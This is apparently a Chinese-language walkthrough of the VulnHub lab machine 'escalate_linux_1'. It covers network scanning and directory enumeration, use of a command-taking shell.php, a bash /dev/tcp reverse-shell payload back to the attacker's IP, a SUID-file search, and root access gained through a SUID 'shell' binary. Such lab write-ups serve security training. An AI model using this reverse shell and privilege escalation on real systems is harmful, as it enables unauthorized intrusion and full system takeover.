信息收集
1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1 00:50:56:c0:00:08 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca VMware, Inc.
192.168.12.140 00:50:56:24:79:77 VMware, Inc.
192.168.12.254 00:50:56:ea:3b:29 VMware, Inc.
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.365 seconds (108.25 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.12.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.12.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca 1 60 VMware, Inc.
192.168.12.140 00:50:56:24:79:77 1 60 VMware, Inc.
192.168.12.254 00:50:56:ea:3b:29 1 60 VMware, Inc.
3、nmap
主机存活探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:34 CST
Nmap scan report for 192.168.12.1
Host is up (0.0053s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000052s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.140
Host is up (0.000049s latency).
MAC Address: 00:50:56:24:79:77 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:EA:3B:29 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.41 seconds
端口探测
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:35 CST
Nmap scan report for 192.168.12.140
Host is up (0.0013s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
36591/tcp open unknown
40519/tcp open unknown
53585/tcp open unknown
56347/tcp open unknown
MAC Address: 00:50:56:24:79:77 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.43 seconds
┌──(root㉿ru)-[~/kali]
└─# cat port.nmap | head -n 14 | tail -n 9 | awk -F "/" '{print($1)}' | xargs -n 9 | sed 's/ /,/g'
80,111,139,445,2049,36591,40519,53585,56347
信息收集
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 80,111,139,445,2049,36591,40519,53585,56347 192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:40 CST
Nmap scan report for 192.168.12.140
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35483/udp6 mountd
| 100005 1,2,3 53357/tcp6 mountd
| 100005 1,2,3 53585/tcp mountd
| 100005 1,2,3 59650/udp mountd
| 100021 1,3,4 34657/tcp6 nlockmgr
| 100021 1,3,4 40519/tcp nlockmgr
| 100021 1,3,4 45296/udp6 nlockmgr
| 100021 1,3,4 54711/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs 3-4 (RPC #100003)
36591/tcp open mountd 1-3 (RPC #100005)
40519/tcp open nlockmgr 1-4 (RPC #100021)
53585/tcp open mountd 1-3 (RPC #100005)
56347/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:50:56:24:79:77 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUX
Host script results:
| smb2-time:
| date: 2023-12-19T08:41:05
|_ start_date: N/A
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: osboxes
| NetBIOS computer name: LINUX\x00
| Domain name: \x00
| FQDN: osboxes
|_ System time: 2023-12-19T03:41:05-05:00
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms 192.168.12.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds
漏洞探测
┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 80,111,139,445,2049,36591,40519,53585,56347
192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:49 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.140
Host is up (0.00012s latency).
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
36591/tcp open unknown
40519/tcp open unknown
53585/tcp open unknown
56347/tcp open unknown
MAC Address: 00:50:56:24:79:77 (VMware)
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 67.60 seconds
4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.140
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.12.140
+ Target Hostname: 192.168.12.140
+ Target Port: 80
+ Start Time: 2023-12-19 16:49:53 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 58a84b35a8d4e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-12-19 16:50:08 (GMT8) (15 seconds)
---------------------------------------------------------------------------
5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.140
WhatWeb report for http://192.168.12.140
Status : 200 OK
Title : Apache2 Ubuntu Default Page: It works
IP : 192.168.12.140
Country : RESERVED, ZZ
Summary : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.29 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.29 (Ubuntu) (from server string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 19 Dec 2023 08:53:50 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 04 Jun 2019 19:43:52 GMT
ETag: "2aa6-58a84b35a8d4e-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3138
Connection: close
Content-Type: text/html
目录探测
1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.140 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.12.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,bak,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/index.html (Status: 200) [Size: 10918]
/.html (Status: 403) [Size: 294]
/shell.php (Status: 200) [Size: 29]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.140 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594
Output File: /root/kali/reports/http_192.168.12.140/_23-12-19_16-55-42.txt
Target: http://192.168.12.140/
[16:55:42] Starting:
[16:55:43] 403 - 300B - /.ht_wsr.txt
[16:55:43] 403 - 303B - /.htaccess.bak1
[16:55:43] 403 - 303B - /.htaccess.orig
[16:55:43] 403 - 305B - /.htaccess.sample
[16:55:43] 403 - 303B - /.htaccess.save
[16:55:43] 403 - 301B - /.htaccessBAK
[16:55:43] 403 - 304B - /.htaccess_extra
[16:55:43] 403 - 302B - /.htaccessOLD2
[16:55:43] 403 - 301B - /.htaccess_sc
[16:55:43] 403 - 301B - /.htaccessOLD
[16:55:43] 403 - 303B - /.htaccess_orig
[16:55:43] 403 - 294B - /.html
[16:55:43] 403 - 303B - /.htpasswd_test
[16:55:43] 403 - 300B - /.httr-oauth
[16:55:43] 403 - 293B - /.htm
[16:55:43] 403 - 299B - /.htpasswds
[16:55:44] 403 - 293B - /.php
[16:56:15] 403 - 302B - /server-status
[16:56:15] 403 - 303B - /server-status/
[16:56:16] 200 - 29B - /shell.php
WEB
传参cmd来获取信息!
反弹shell
payload
/bin/bash -c 'bash -i >&/dev/tcp/192.168.12.128/5656 0>&1'
提权
user6 / home user3 find / -perm -u=s -type f 2>/dev/null
<ind / -perm -u=s -type f 2>/dev/null
<ind / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/sbin/mount.ecryptfs_private
/sbin/mount.cifs
/usr/sbin/pppd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/arping
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/umount
/bin/fusermount
/home/user5/script
/home/user3/shell
user6 / home cd user3
cd user3
user6 / home user3 ls -al
ls -al
total 160
drwxr-xr-x 22 user3 user3 4096 Jun 4 2019 .
drwxr-xr-x 10 root root 4096 Jun 5 2019 ..
-rw-r--r-- 1 user3 user3 124 Jun 4 2019 .asoundrc
-rw-r--r-- 1 user3 user3 95 Jun 4 2019 .bash_history
-rw-r--r-- 1 user3 user3 220 Jun 4 2019 .bash_logout
-rw-r--r-- 1 user3 user3 949 Jun 4 2019 .bashrc
drwxr-xr-x 15 user3 user3 4096 Jun 4 2019 .cache
drwxr-xr-x 20 user3 user3 4096 Jun 4 2019 .config
drwxr-xr-x 3 user3 user3 4096 Jun 4 2019 .dbus
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Desktop
-rw-r--r-- 1 user3 user3 23 Jun 4 2019 .dmrc
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Documents
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Downloads
-rw-r--r-- 1 user3 user3 9354 Jun 4 2019 .face
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 .gconf
drwxr-xr-x 24 user3 user3 4096 Jun 4 2019 .gimp-2.8
-rw-r--r-- 1 user3 user3 0 Jun 4 2019 .gksu.lock
drwxr-xr-x 3 user3 user3 4096 Jun 4 2019 .gnome
drwxr-xr-x 3 user3 user3 4096 Jun 4 2019 .gnome2
drwxr-xr-x 3 user3 user3 4096 Jun 4 2019 .gnupg
-rw-r--r-- 1 user3 user3 20 Jun 4 2019 .gtk-bookmarks
-rw-r--r-- 1 user3 user3 105 Jun 4 2019 .gtkrc-2.0
-rw------- 1 user3 user3 4710 Jun 4 2019 .ICEauthority
drwxr-xr-x 3 user3 user3 4096 Jun 4 2019 .local
drwxr-xr-x 5 user3 user3 4096 Jun 4 2019 .mozilla
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Music
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Pictures
-rw-r--r-- 1 user3 user3 873 Jun 4 2019 .profile
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Public
-rwxr-xrwx 1 root root 33 Jun 4 2019 .script.sh
-rwsr-xr-x 1 root root 8392 Jun 4 2019 shell
-rw-r--r-- 1 user3 user3 0 Jun 4 2019 .sudo_as_admin_successful
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Templates
drwxr-xr-x 3 user3 user3 4096 Jun 4 2019 .thumbnails
drwxr-xr-x 4 user3 user3 4096 Jun 4 2019 .thunderbird
drwxr-xr-x 2 user3 user3 4096 Jun 4 2019 Videos
-rw-r--r-- 1 user3 user3 50 Jun 4 2019 .Xauthority
user6 / home user3 ./shell
./shell
You Can't Find Me
Welcome to Linux Lite 4.4 user6
Tuesday 19 December 2023, 05:19:27
Memory Usage: 334/985MB (33.91%)
Disk Usage: 5/217GB (3%)
Support - https://www.linuxliteos.com/forums/ (Right click, Open Link)
root / home user3 id
id
uid=0(root) gid=0(root) groups=0(root),1005(user6)
我们这里直接执行就提权了!我觉得应该还有很多种提权方法!可以去参考一下博主!大概有十多种提权方法,本靶机主要就是练习linux提权的!
工具 : https://blog.csdn.net/bwlab/article/details/121045674
转发:
vulnhub Linux提权靶机 | escalate_linux_1 | tari Blog咕咕了很久的提权靶机(https://tari.moe/p/2022/escalate-linux-1?_sw-precache=65fa1d960db1340738052bf3d9943516